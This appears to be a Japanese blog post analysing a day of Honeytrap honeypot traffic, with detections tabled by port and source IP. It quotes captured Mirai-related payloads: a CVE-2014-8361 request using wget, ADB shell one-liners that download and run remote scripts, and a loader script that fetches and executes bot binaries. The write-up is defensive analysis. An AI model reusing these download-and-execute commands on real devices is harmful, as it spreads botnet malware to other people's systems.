ハニーポット分析(4日目:2018/8/11)
ハニーポット分析 4日目です。
本日は、時間があまり取れないため、Honeytrapのみの分析となります。
1. Honeytrap 検知数 6528
<宛先ポート別 TOP10>
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 2,338 | 35.82% | 調査行為(SMB) |
23 | TELNET | 1,522 | 23.32% | 調査行為(ペイロードなし) |
5900 | VNC | 357 | 5.47% | 調査行為(ペイロードなし) |
9960 | ? | 226 | 3.46% | 調査行為(SSH) |
2323 | TELNET | 158 | 2.42% | 調査行為(ペイロードなし) |
3306 | MySQL | 113 | 1.73% | 調査行為(ペイロードなし) |
3389 | RDP | 85 | 1.30% | ログイン試行(Cookie: mstshash) |
52869 | D-Link, Realtek SDK | 83 | 1.27% | マルウェアダウンロード |
1433 | Microsoft SQL Server | 66 | 1.01% | 調査行為? |
5555 | Android Debug Bridge (ADB) ? | 54 | 0.83% | マルウェアダウンロード |
9960ポート:
SSHでアクセス出来るかの調査行為であり、脆弱性を狙った攻撃ではありませんでした。
<検知ペイロード>
SSH-2.0-libssh2_1.4.3
52869 ポート:
CVE-2014-8361 の脆弱性を狙ったものであり、前日同様にMirai関連のマルウェアでした(ファイルダウンロード先の変更なし)
<攻撃パケット>
POST /picsdesc.xml
wget http[:]//212[.]237[.]32[.]xx/mips -O am
POST /wanipcn.xml
wget http[:]//212[.]237[.]32[.]xx -O am
5555ポート:
検知したペイロードは以下であり、をダウンロードしようと試みるものでした。
①
shell:cd /data/local/tmp;wget http[:]//207[.]148[.]78[.]xxx/br -O- >br;sh br;busybox wget http[:]//207[.]148[.]78[.]xxx/r -O- >r;sh r;curl http[:]//207[.]148[.]78[.]xxx/c >c;sh c;busybox curl http[:]//207[.]148[.]78[.]xxx/bc >bc;sh bc;rm -rf bc br r c;"
→以下のファイルをダウンロード
#!/bin/sh
n="arm7 arm5 arm mips mpsl x86 x64 i686"
http_server="207[.]148[.]78[.]xxx"
cd /data/local/tmp
for i in $n
do
cp /system/bin/sh z
>z
wget http://$http_server/qtx.$i -O- > z
chmod 777 z
./z $i
done
→通信先をVirusTotalで調査したところ、Mirai関連のマルウェアでした。
②
shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget http[:]//185[.]162[.]130[.]xxx/adbs -O -> adbs; sh adbs; curl http[:]//185[.]162[.]130[.]xxx/adbs2 > adbs2; sh adbs2; rm adbs adbs2
→該当のURLへのアクセス不可
断定は出来ないですが、おそらくMirai関連だと思います。
<送信元IP別 TOP10>
送信元IP | 国 | 検知数 | 割合 | 攻撃ポート |
185.209.0.XX | Latvia | 278 | 4.26% | 複数ポート |
46.218.35.xx |
France |
226 | 3.46% | 9960 |
60.56.207.xx | Japan | 207 | 3.17% | 23 |
59.14.195.xx | Korea | 203 | 3.11% | 5900,5901,5902,5903,5904,5907,5909 |
185.56.81.xx | Seychelles | 191 | 2.93% | 5900 |
185.209.0.xy | Latvia | 119 | 1.82% | 複数ポート |
185.156.177.xxx | Russian | 104 | 1.59% | 複数ポート |
211.105.119.xxx | Korea | 102 | 1.56% | 5900 |
219.91.138.xxx | India | 83 | 1.27% | 23 |
154.8.218.xx | China | 61 | 0.93% | 3306 |
IoT製品を狙った攻撃はIPを分散させる傾向にあるため、TOP10にはランクインするケースは少ないように感じます。
攻撃ポートが複数ポートと書いてあるものはポートスキャンとなっています。
ペイロードサイズが 0byteのものはあまり見ても面白くないので、次回以降は除外しようと思います。
以上、4日目の分析でした。